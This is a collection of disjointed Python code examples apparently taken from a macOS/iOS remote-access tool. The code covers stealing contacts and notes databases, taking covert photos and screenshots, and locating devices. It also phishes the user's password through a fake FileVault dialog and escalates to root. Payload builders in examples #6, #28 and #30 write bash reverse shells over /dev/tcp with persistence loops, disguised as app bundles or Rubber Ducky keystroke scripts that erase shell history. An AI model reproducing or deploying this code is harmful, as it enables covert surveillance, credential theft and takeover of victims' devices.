Beispiel #1
0
	def run(self,session,cmd_data):
		if len(cmd_data['args'].split()) < 2:
            		print self.usage
            		return
		
		w = os.environ['OLDPWD']
                os.chdir(w)
		payload = """if [[ -d """+cmd_data['args'].split()[0]+""" ]]
		then
		echo 0
		fi"""
		dchk = session.send_command({"cmd":"","args":payload})
		chk = session.send_command({"cmd":"stat","args":cmd_data['args'].split()[0]})
                if chk[:4] != "stat":
		    if dchk == "0\n":
			h.info_error("Error: "+cmd_data['args'].split()[0]+": not a file!")
		    else:
		        if os.path.isdir(cmd_data['args'].split()[1]):
		    	    if os.path.exists(cmd_data['args'].split()[1]):
			        rp = os.path.split(cmd_data['args'].split()[0])[1]
			        data = session.download_file(cmd_data['args'].split()[0])
			        h.info_general("Downloading {0}...".format(rp))
			        if data:
			            h.info_general("Saving to "+cmd_data['args']+"/{0}...".format(rp))
			            f = open(os.path.join(cmd_data['args'].split()[1],rp),'w')
			            f.write(data)
			            f.close()
                                    if cmd_data['args'].split()[1][-1:] == "/":
                                        h.info_success("Saved to "+cmd_data['args'].split()[1]+""+rp+"!")
                                    else:
			                h.info_success("Saved to "+cmd_data['args'].split()[1]+"/"+rp+"!")
                            else:
                                h.info_error("Local directory: "+cmd_data['args'].split()[1]+": does not exist!")
			else:
			    rp = os.path.split(cmd_data['args'].split()[1])[0]
			    if rp == "":
		    		rp = "."
			    else:
		    		pass
                            if os.path.exists(rp):
			        if os.path.isdir(rp):
				    prr = os.path.split(cmd_data['args'].split()[1])[0]
				    rp = os.path.split(cmd_data['args'].split()[1])[1]
				    pr = os.path.split(cmd_data['args'].split()[0])[1]
			    	    data = session.download_file(cmd_data['args'].split()[0])
			    	    h.info_general("Downloading {0}...".format(pr))
			    	    if data:
			                h.info_general("Saving to {0}...".format(cmd_data['args'].split()[1]))
			                f = open(os.path.join(prr,rp),'w')
			                f.write(data)
			                f.close()
			                h.info_success("Saved to "+cmd_data['args'].split()[1]+"!")
                                else:
				    h.info_error("Error: "+rp+": not a directory!")
                   	    else:
			        h.info_error("Local directory: "+rp+": does not exists!")
                else:
		    h.info_error("Remote file: "+cmd_data['args'].split()[0]+": does not exist!")
		g = os.environ['HOME']
                os.chdir(g + "/mouse")
Beispiel #2
0
 def run(self, session, cmd_data):
     cmd_data["cmd"] = ";"
     cmd_data[
         "args"] = '/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend'
     error = session.send_command(cmd_data)
     if error:
         h.info_error("Failed to suspend current session!")
Beispiel #3
0
 def set_host_port(self):
     try:
         lhost = h.getip()
         lport = None
         choice = input(h.info_general_raw("Local host: ")).strip(" ")
         if choice != "":
             lhost = choice
         while True:
             lport = input(h.info_general_raw("Local port: ")).strip(" ")
             if not lport:
                 lport = 4444
             try:
                 lport = int(lport)
             except ValueError:
                 h.info_error("Invalid port, please enter a valid integer.")
                 continue
             if lport < 1024:
                 h.info_error("Invalid port, please enter a value >= 1024.")
                 continue
             break
         h.info_general("Using " + lhost + ":" + str(lport) + "...")
         self.host = socket.gethostbyname(lhost)
         self.port = lport
         return True
     except KeyboardInterrupt:
         return
Beispiel #4
0
 def upload_file(self, file_path, remote_dir, remote_file_name):
     term = binascii.hexlify(os.urandom(16))
     if os.path.exists(file_path):
         f = open(file_path, "rb")
         data = f.read()
         size = len(data)
         name = os.path.split(file_path)[-1]
         cmd_data = json.dumps({
             "cmd":
             "upload",
             "args":
             json.dumps({
                 "size": size,
                 "path": remote_dir,
                 "filename": remote_file_name
             }),
             "term":
             term.decode()
         })
         self.sock_send(cmd_data)
         for i in range((int(size / 1024)) + 1):
             deltax = i * 1024
             chunk = data[deltax:deltax + 1024]
             self.conn.send(chunk)
         self.sock_send(term.decode())
     else:
         h.info_error("Local file: " + file_path + ": does not exist!")
Beispiel #5
0
 def show_session(self, session):
     try:
         print str(session.id) + " | " +\
         session.hostname + "@" + session.username + " | " + \
         str(session.conn.getpeername()[0])
     except Exception as e:
         h.info_error(str(e))
Beispiel #6
0
	def run(self,server):
		while 1:
			shell = raw_input(h.info_general_raw("Target Shell: "))
                        name = raw_input(h.info_general_raw("Application Name: "))
                        icon = raw_input(h.info_general_raw("Application Icon: "))
			persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower()
			if persistence == "y":
				shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
				break
			elif persistence == "n" or not persistence:
				shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
				break
			else:
				h.info_error("Unrecognized option!")

		if os.path.exists("payloads") == False:
			os.mkdir("payloads")
		if os.path.exists("payloads/macos_application") == False:
			os.mkdir("payloads/macos_application")
			os.system("""
cp -r data/app/payload.app payloads/macos_application
mv payloads/macos_application/payload.app payloads/macos_application/"""+name+""".app
mv """+icon+""" payloads/macos_application/"""+name+""".app/Contents/Resources/payload.icns
                        """)
		payload_save_path = "payloads/macos_application/"+name+".app/Contents/MacOS/payload.sh"
                sas = "payloads/macos_application/"+name+".app"
		payload = """\
#! /usr/bin/env bash
"""+shell_command+"""
                """
		f = open(payload_save_path,"w")
		f.write(payload)
		f.close()
		h.info_general("Payload saved to " + sas)
		os.system("chmod +x payloads/macos_application/"+name+".app/Contents/MacOS/payload.sh")
Beispiel #7
0
 def run(self, session, cmd_data):
     if not cmd_data['args'] or (cmd_data['args'] != "front"
                                 and cmd_data['args'] != "back"):
         print self.usage
         return
     if cmd_data['args'] == "back":
         cmd_data['args'] = False
     else:
         cmd_data['args'] = True
     h.info_general("Taking picture...")
     try:
         response = json.loads(session.send_command(cmd_data))
         if 'success' in response:
             size = int(response["size"])
             if cmd_data['args'] == False:
                 file_name = "back_{0}.jpg".format(int(time.time()))
             else:
                 file_name = "front_{0}.jpg".format(int(time.time()))
             data = session.sock_receive_data(size)
             h.info_general("Saving {0}".format(file_name))
             # save to file
             f = open(os.path.join('downloads', file_name), 'w')
             f.write(data)
             f.close()
             h.info_general("Saved to downloads/{0}".format(file_name))
         else:
             if 'error' in response:
                 h.info_error(response['error'])
             else:
                 h.info_error("Unexpected error!")
     except Exception as e:
         print e
Beispiel #8
0
    def interact(self):
        h.info_general("Listening on port {0}...".format(self.server.port))
        h.info_general("Type \"help\" for commands.")
        while 1:
            try:
                input_data = raw_input(self.handle)
                if not input_data:
                    continue
                cmd = input_data.split()[0]
                args = input_data[len(cmd):].strip()
                if cmd == "interact":
                    self.interact_with_session(args)
                elif cmd == "close":
                    self.close_session(args)
                elif cmd == "sessions":
                    self.list_sessions()
                elif cmd == "help":
                    self.show_commands()
                elif cmd == "exit":
                    self.stop_server()
                    return
                else:
                    h.info_error("Unrecognized command!")

            except KeyboardInterrupt:
                sys.stdout.write("\n")
                self.stop_server()
                return
Beispiel #9
0
    def run(self, session, cmd_data):
        if len(cmd_data['args'].split()) < 1:
            print(self.usage)
            return

        w = os.environ['OLDPWD']
        os.chdir(w)
        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            if os.path.exists(dest):
                h.info_general("Getting contacts...")
                data = session.download_file(
                    '/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
                if data:
                    f = open(os.path.join(dest, 'contacts.sqlitedb'), 'wb')
                    f.write(data)
                    f.close()
                    if dest[-1] == "/":
                        h.info_general("Saving to " + dest +
                                       "contacts.sqlitedb...")
                        time.sleep(1)
                        h.info_info("Saved to " + dest + "contacts.sqlitedb.")
                    else:
                        h.info_general("Saving to " + dest +
                                       "/contacts.sqlitedb...")
                        time.sleep(1)
                        h.info_info("Saved to " + dest + "/contacts.sqlitedb.")
                else:
                    h.info_error("Failed to get contacts!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            rp = os.path.split(dest)[0]
            if rp == "":
                rp = "."
            else:
                pass
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Getting contacts...")
                    data = session.download_file(
                        '/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
                    if data:
                        f = open(os.path.join(pr, rp), 'wb')
                        f.write(data)
                        f.close()
                        h.info_general("Saving to " + dest + "...")
                        time.sleep(1)
                        h.info_info("Saved to " + dest + ".")
                    else:
                        h.info_error("Failed to get contacts!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
        g = os.environ['HOME']
        os.chdir(g + "/mouse")
Beispiel #10
0
 def interact_with_session(self, session_number):
     if not session_number:
         print("Usage: interact <session>")
         return
     try:
         self.sessions_id[int(session_number)].interact()
     except:
         h.info_error("No such session!")
Beispiel #11
0
 def interact_with_session(self, session_number):
     if not session_number:
         print "Usage: interact <session_ID>"
         return
     try:
         self.sessions_id[int(session_number)].interact()
     except:
         h.info_error("Invalid session ID!")
Beispiel #12
0
 def run(self,session,cmd_data):
     if session.send_command(cmd_data).decode().split("\n")[0] == "Unable to get Coordinates":
         h.info_error("Failed to locate device!")
     else:
         latitude = session.send_command(cmd_data).decode().split("\n")[0].strip("Latitude : ")
         longitude = session.send_command(cmd_data).decode().split("\n")[1].strip("Longitude : ")
         h.info_info("Latitude: "+latitude)
         h.info_info("Longitude: "+longitude)
Beispiel #13
0
 def run(self, session, cmd_data):
     if not cmd_data['args']:
         print("Usage: setvol <level: 0-100>")
         return -1
     payload = "set volume output volume " + cmd_data['args']
     cmd_data.update({"cmd": "applescript", "args": payload})
     error = session.send_command(cmd_data)
     if error:
         h.info_error("Failed to set output volume!")
Beispiel #14
0
    def run(self, session, cmd_data):
        if len(cmd_data['args'].split()) < 1:
            print self.usage
            return

        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            if os.path.exists(dest):
                h.info_general("Taking screenshot...")
                result = json.loads(session.send_command(cmd_data))
                if 'error' in result:
                    h.info_error("Failed to take screenshot!")
                    return
                if 'size' in result:
                    size = int(result['size'])
                    data = session.sock_receive_data(size)
                    f = open(os.path.join(dest, 'screenshot.jpg'), 'w')
                    f.write(data)
                    f.close()
                if dest[-1:] == "/":
                    h.info_general("Saving to " + dest + "screenshot.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "screenshot.jpg!")
                else:
                    h.info_general("Saving to " + dest + "/screenshot.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "/screenshot.jpg!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            rp = os.path.split(dest)[0]
            if rp == "":
                rp = "."
            else:
                pass
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Taking screenshot...")
                    result = json.loads(session.send_command(cmd_data))
                    if 'error' in result:
                        h.info_error("Failed to take screenshot!")
                        return
                    if 'size' in result:
                        size = int(result['size'])
                        data = session.sock_receive_data(size)
                        f = open(os.path.join(pr, rp), 'w')
                        f.write(data)
                        f.close()
                    h.info_general("Saving to " + dest + "...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
Beispiel #15
0
 def run(self, session, cmd_data):
     h.info_general("Launching SafeMode...")
     time.sleep(1)
     cmd_data["cmd"] = ";"
     cmd_data[
         "args"] = "touch /var/mobile/Library/Preferences/com.saurik.mobilesubstrate.dat; killall SpringBoard"
     error = session.send_command(cmd_data)
     if error:
         h.info_error("Failed to put device into SafeMode!")
Beispiel #16
0
 def run(self, session, cmd_data):
     h.info_general("Connecting to device...")
     time.sleep(0.5)
     h.info_general("Opening device shell...")
     time.sleep(1)
     while 1:
         uid = session.send_command({
             "cmd": "echo",
             "args": "$UID"
         }).decode()
         if uid[:-1] == "0":
             whoami = "# "
         else:
             whoami = "$ "
         shell = input(h.ENDC + session.hostname + ":" +
                       session.current_directory + " " + session.username +
                       whoami).strip(" ")
         if not shell or shell.replace(" ", "") == "":
             continue
         shelld = shell.split()[0]
         shelld_data = {"cmd": shelld, "args": shell[len(shelld) + 1:]}
         if shelld == "cd":
             result = json.loads(session.send_command(shelld_data))
             if 'error' in result:
                 h.info_error(result['error'])
             elif 'current_directory' in result:
                 session.current_directory = result['current_directory']
             else:
                 h.info_error('Unable to get current directory!')
         if shelld == "ls":
             if len(shell.split()) < 2:
                 print(
                     session.send_command({
                         'cmd': 'ls -al',
                         'args': '.'
                     }).decode())
             else:
                 print(
                     session.send_command({
                         'cmd': 'ls -al',
                         'args': shell.split()[1]
                     }).decode())
         if shelld == "exit":
             return
         else:
             try:
                 if shelld == "ls" or shelld == "cd":
                     pass
                 else:
                     result = session.send_command({
                         'cmd': '',
                         'args': shell
                     })
                     if result:
                         print(result.decode().rstrip())
             except KeyboardInterrupt:
                 session.send_command({"cmd": "killtask"})
Beispiel #17
0
    def run(self, session, cmd_data):
        if len(cmd_data['args'].split()) < 1:
            print self.usage
            return

        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            if os.path.exists(dest):
                h.info_general("Taking picture...")
                response = json.loads(session.send_command(cmd_data))
                try:
                    success = response["status"]
                    if success == 1:
                        size = int(response["size"])
                        data = session.sock_receive_data(size)
                        f = open(os.path.join(dest, 'picture.jpg'), 'w')
                        f.write(data)
                        f.close()
                except:
                    h.info_error("Failed to take picture!")
                    return
                if dest[-1:] == "/":
                    h.info_general("Saving to " + dest + "picture.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "picture.jpg!")
                else:
                    h.info_general("Saving to " + dest + "/picture.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "/picture.jpg!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            rp = os.path.split(dest)[0]
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Taking picture...")
                    response = json.loads(session.send_command(cmd_data))
                    try:
                        success = response["status"]
                        if success == 1:
                            size = int(response["size"])
                            data = session.sock_receive_data(size)
                            f = open(os.path.join(pr, rp), 'w')
                            f.write(data)
                            f.close()
                    except:
                        h.info_error("Failed to take picture!")
                        return
                    h.info_general("Saving to " + dest + "...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
Beispiel #18
0
 def run(self,session,cmd_data):
     if not cmd_data['args'] or not cmd_data['args'] in ['play','pause','next','prev','info']:
         print(self.usage)
     result = session.send_command(cmd_data)
     if result:
         if result.decode().rstrip() == "Not Playing":
             h.info_error("Not playing!")
         else:
             print(result.decode().rstrip())
Beispiel #19
0
 def close_session(self, session_number):
     if not session_number:
         print "Usage: close <session_ID>"
         return
     try:
         session = self.sessions_id[int(session_number)]
         session.disconnect(False)
         h.info_general('Closing session ' + session_number + '...')
     except:
         h.info_error("Invalid session ID!")
Beispiel #20
0
 def run(self, session, cmd_data):
     if not cmd_data['args'] or not cmd_data['args'] in ['on', 'off']:
         print(self.usage)
         return
     if cmd_data['args'] == "on":
         cmd_data = {'cmd': 'locationon', 'args': ''}
     elif cmd_data['args'] == "off":
         cmd_data = {'cmd': 'locationoff', 'args': ''}
     error = session.send_command(cmd_data)
     if error:
         h.info_error("Mouse Substrate is not installed!")
Beispiel #21
0
    def run(self, session, cmd_data):
        if len(cmd_data['args'].split()) < 1:
            print(self.usage)
            return

        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            if os.path.exists(dest):
                h.info_general("Getting notes...")
                data = session.download_file(
                    '/var/mobile/Library/Notes/notes.sqlite')
                if data:
                    f = open(os.path.join(dest, 'notes.sqlite'), 'wb')
                    f.write(data)
                    f.close()
                    if dest[-1] == "/":
                        h.info_general("Saving to " + dest + "notes.sqlite...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "notes.sqlite!")
                    else:
                        h.info_general("Saving to " + dest +
                                       "/notes.sqlite...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "/notes.sqlite!")
                else:
                    h.info_error("Failed to get notes!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            rp = os.path.split(dest)[0]
            if rp == "":
                rp = "."
            else:
                pass
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Getting notes...")
                    data = session.download_file(
                        '/var/mobile/Library/Notes/notes.sqlite')
                    if data:
                        f = open(os.path.join(pr, rp), 'wb')
                        f.write(data)
                        f.close()
                        h.info_general("Saving to " + dest + "...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "!")
                    else:
                        h.info_error("Failed to get notes!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
Beispiel #22
0
 def download_file(self, path):
     raw = self.send_command({"cmd": "download", "args": path})
     result = json.loads(raw)
     status = result['status']
     if status == 1:
         if 'size' in result:
             size = int(result['size'])
             return self.sock_receive_data(size)
     elif status == 0:
         h.info_error("Remote file: " + path + ": does not exist!")
     elif status == 2:
         h.info_error("Remote file: " + path + ": does not exist!")
Beispiel #23
0
 def run(self, session, cmd_data):
     while 1:
         uid = session.send_command({"cmd": "echo", "args": "$UID"})
         if uid[:-1] == "0":
             whoami = "# "
         else:
             whoami = "$ "
         shell = raw_input(h.ENDC + session.hostname + ":" +
                           session.current_directory + " " +
                           session.username + whoami)
         if not shell or shell.replace(" ", "") == "":
             continue
         shelld = shell.split()[0]
         shelld_data = {"cmd": shelld, "args": shell[len(shelld) + 1:]}
         if shelld == "cd":
             result = json.loads(session.send_command(shelld_data))
             if 'error' in result:
                 h.info_error(result['error'])
             elif 'current_directory' in result:
                 session.current_directory = result[
                     'current_directory'].encode('utf-8')
             else:
                 h.info_error('Unable to get current directory!')
         if shelld == "ls":
             if not shelld_data['args']:
                 shelld_data['args'] = '.'
             data = session.send_command(shelld_data)
             try:
                 contents = json.loads(data)
             except:
                 print data
                 return
             keys = contents.keys()
             keys.sort()
             for k in keys:
                 if contents[k] == 4 or contents[k] == 10:
                     print h.COLOR_INFO + k + h.ENDC
                 else:
                     print k
         if shelld == "exit":
             return
         else:
             try:
                 result = session.send_command(shelld_data)
                 if result:
                     if shelld == "ls" or shelld == "cd":
                         pass
                     else:
                         print result.rstrip()
             except KeyboardInterrupt:
                 session.send_command({"cmd": "killtask"})
Beispiel #24
0
    def run(self, session, cmd_data):
        payload = """
        tell application "Finder"
            activate

            set myprompt to "Type your password to allow System Preferences to make changes"
                        
            set ans to "Cancel"

            repeat
                try
                    set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
                    set ans to button returned of d_returns
                    set mypass to text returned of d_returns
                    if mypass > "" then exit repeat
                end try
            end repeat
                        
            try
                do shell script "echo " & quoted form of mypass
            end try
        end tell
        """
        cmd_data.update({"cmd": "applescript", "args": payload})
        password = session.send_command(cmd_data).strip()
        #display response
        print h.COLOR_INFO + "[*] " + h.WHITE + "Response: " + h.GREEN + password + h.WHITE
        #prompt for root
        tryroot = raw_input("Would you like to try for root? (Y/n) ").strip(
            " ")
        tryroot = tryroot if tryroot else "y"
        if tryroot.lower() != "y":
            return ""
        #TODO: I am so lazy, probably should use the su command
        password = password.replace("\\", "\\\\").replace("'", "\\'")
        cmd_data.update({"cmd": "eggsu", "args": password})
        result = session.send_command(cmd_data)
        if "root" in result:
            h.info_general("Root Granted!")
            time.sleep(0.2)
            h.info_general("Escalating Privileges...")
            if session.server.is_multi == False:
                session.server.update_session(session)
            else:
                session.needs_refresh = True
        else:
            h.info_error("Failed getting root!")
        return ""
Beispiel #25
0
    def listen_for_stager(self):
        identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'

        h.info_general("Binding to " + self.host + ":" + str(self.port) +
                       "...")
        sr = os.system("ping -c 1 " + self.host + " >/dev/null 2>&1")
        if sr != 0:
            h.info_error("Failed to bind to " + self.host + ":" +
                         str(self.port) + "!")
            input("Press enter to continue...").strip(" ")
            return
        try:
            s = socket.socket()
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(('0.0.0.0', self.port))
            s.listen(1)
        except:
            h.info_error("Failed to bind to " + self.host + ":" +
                         str(self.port) + "!")
            input("Press enter to continue...").strip(" ")
            return
        h.info_general("Listening on port " + str(self.port) + "...")
        try:
            conn, addr = s.accept()
        except KeyboardInterrupt:
            s.close()
            return

        hostAddress = addr[0]
        h.info_general("Connecting to " + hostAddress + "...")
        conn.send(identification_shell_command.encode())
        try:
            device_arch = conn.recv(128).decode().strip()
            if not device_arch:
                return
        except:
            return

        try:
            bash_stager, executable = self.craft_payload(device_arch)
        except Exception as e:
            return
        self.debug_print(bash_stager.strip())
        conn.send(bash_stager.encode())

        conn.send(executable)
        conn.close()
        h.info_general("Establishing connection...")

        try:
            return self.listen_for_executable_payload(s)
        except ssl.SSLError as e:
            h.info_error("SSL error: " + str(e))
            return
        except Exception as e:
            h.info_error("Error: " + str(e))
            input("Press enter to continue...").strip(" ")
            return
Beispiel #26
0
 def run(self, session, cmd_data):
     h.info_general("Taking screenshot...")
     result = json.loads(session.send_command(cmd_data))
     if 'error' in result:
         h.info_error(result['error'])
         return
     elif 'size' in result:
         size = int(result['size'])
         data = session.sock_receive_data(size)
         file_name = "screenshot_{0}.jpg".format(int(time.time()))
         h.info_general("Saving {0}".format(file_name))
         # save to file
         f = open(os.path.join('downloads', file_name), 'w')
         f.write(data)
         f.close()
         h.info_success("Saved to downloads/{0}!".format(file_name))
Beispiel #27
0
 def run(self, session, cmd_data):
     password = getpass.getpass("Password: "******"\\", "\\\\").replace("'", "\\'")
     cmd_data['cmd'] = "eggsu"
     result = session.send_command(cmd_data)
     if "root" in result:
         h.info_general("Root Granted!")
         time.sleep(0.2)
         h.info_general("Escalating Privileges...")
         if session.server.is_multi == False:
             session.server.update_session(session)
         else:
             session.needs_refresh = True
     else:
         h.info_error("Failed getting root!")
Beispiel #28
0
    def run(self, server):
        while 1:
            shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
            persistence = raw_input(
                h.info_question_raw("Make Persistent? (y/N): ")).strip(
                    " ").lower()
            if persistence == "y":
                shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                shell_clean = "history -wc;killall Terminal"
                break
            elif persistence == "n" or not persistence:
                shell_command = shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                shell_clean = "history -wc;killall Terminal"
                break
            else:
                h.info_error("Unrecognized option!")

        shell_command += "history -wc;killall Terminal"
        if os.path.exists("payloads") == False:
            os.mkdir("payloads")
        if os.path.exists("payloads/rubber_duck") == False:
            os.mkdir("payloads/rubber_duck")
        payload_save_path = "payloads/rubber_duck/payload.txt"
        payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """ + shell_command + """
DELAY 500
ENTER
DELAY 500
"""
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_general("Payload saved to " + payload_save_path)
Beispiel #29
0
    def interact(self):
        """Interact with an active session"""
        readline.clear_history()
        readline.set_completer(self.tab_complete)
        readline.parse_and_bind('tab: complete')

        command_modules = self.server.get_modules(self.type)
        while 1:
            try:
                #prepare command
                raw = input(self.get_handle()).strip(" ")
                if not raw or raw.replace(" ", "") == "":
                    continue
                cmd = raw.split()[0]
                cmd_data = {"cmd": cmd, "args": raw[len(cmd) + 1:]}

                if self.needs_refresh:
                    # don't do anything if we are in the middle of updating session
                    pass
                elif cmd == "exit":
                    self.disconnect(True)
                    return
                elif cmd == "back" and self.server.is_multi:
                    return
                elif cmd == "help":
                    self.show_commands()
                elif cmd in command_modules.keys():
                    command_modules[cmd].run(self, cmd_data)
                elif cmd in self.server.modules_local.keys():
                    self.server.modules_local[cmd].run(self, cmd_data)
                else:
                    h.info_error("Unrecognized command!")
            except KeyboardInterrupt:
                try:
                    print("")
                    if readline.get_line_buffer():
                        continue
                except:
                    pass
                self.disconnect(True)
                return
            except Exception as e:
                print(e)
Beispiel #30
0
	def run(self,server):
		while 1:
			shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
			persistence = raw_input(h.info_question_raw("Make Persistent? (y/n): ")).strip(" ").lower()
			if persistence == "y":
				shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
				shell_clean = "history -wc;killall Terminal"
				break
			else:
				shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
				shell_clean = "history -wc;killall Terminal"
				break
		shell_command += "history -wc;killall Terminal"
		path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
		direct = os.path.split(path)[0]
		if os.path.exists(direct):
		    if os.path.isdir(direct):
		        payload_save_path = path
		    else:
			h.info_error("Error: "+direct+": not a directory!")
			exit
		else:
		    h.info_error("Local directory: "+direct+": does not exist!")
		    exit
			
		payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """+shell_command+"""
DELAY 500
ENTER
DELAY 500"""
		h.info_general("Saving to " + payload_save_path + "...")
		f = open(payload_save_path,"w")
		f.write(payload)
		f.close()
		h.info_success("Saved to " + payload_save_path + "!")